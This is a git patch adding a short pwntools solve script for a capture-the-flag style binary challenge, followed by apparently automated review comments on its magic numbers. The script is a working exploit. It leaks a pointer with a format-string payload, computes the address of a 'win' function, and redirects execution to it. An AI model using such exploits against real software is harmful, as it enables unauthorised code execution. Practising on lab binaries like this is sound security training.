From 7ccc26a4f627d5b9cbd0a31b0c23339817cf0468 Mon Sep 17 00:00:00 2001
From: jc
Date: Wed, 12 Mar 2025 21:26:39 +0300
Subject: [PATCH] solve script
---
random_challs/jmp_to_win/a.py | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 random_challs/jmp_to_win/a.py
diff --git a/random_challs/jmp_to_win/a.py b/random_challs/jmp_to_win/a.py
new file mode 100644
index 0000000..59854db
--- /dev/null
+++ b/random_challs/jmp_to_win/a.py
@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./vuln", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# leak
+s(b"%23$p")
+main = int(r.recvline(), 16)
+log.info("main: %#x", main)
+win = main - 0x96
+log.info("win: %#x", win)
+
+# jmp
+s(str(hex(win)).encode())
+
+r.interactive()
\ No newline at end of file
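Review bot: The stack index in `s(b"%23$p")` and the offset in `win = main - 0x96` are bare magic numbers with no note on which build of `./vuln` they were measured against, so after any recompile the script will compute a wrong address without reporting an error. I would add a comment above the leak such as `# arg 23 of the format string holds a pointer the author treats as main; win sits 0x96 below it in this build (re-measure after rebuilding)`, worded to match what was actually observed. `int(r.recvline(), 16)` raises an unhelpful ValueError if the reply is `(nil)` or carries extra text, so a short check with a clear message would help whoever reruns this. Two smaller points: `str(hex(win))` is redundant because `hex()` already returns a string (`s(hex(win).encode())`), and `target` is assigned but never used.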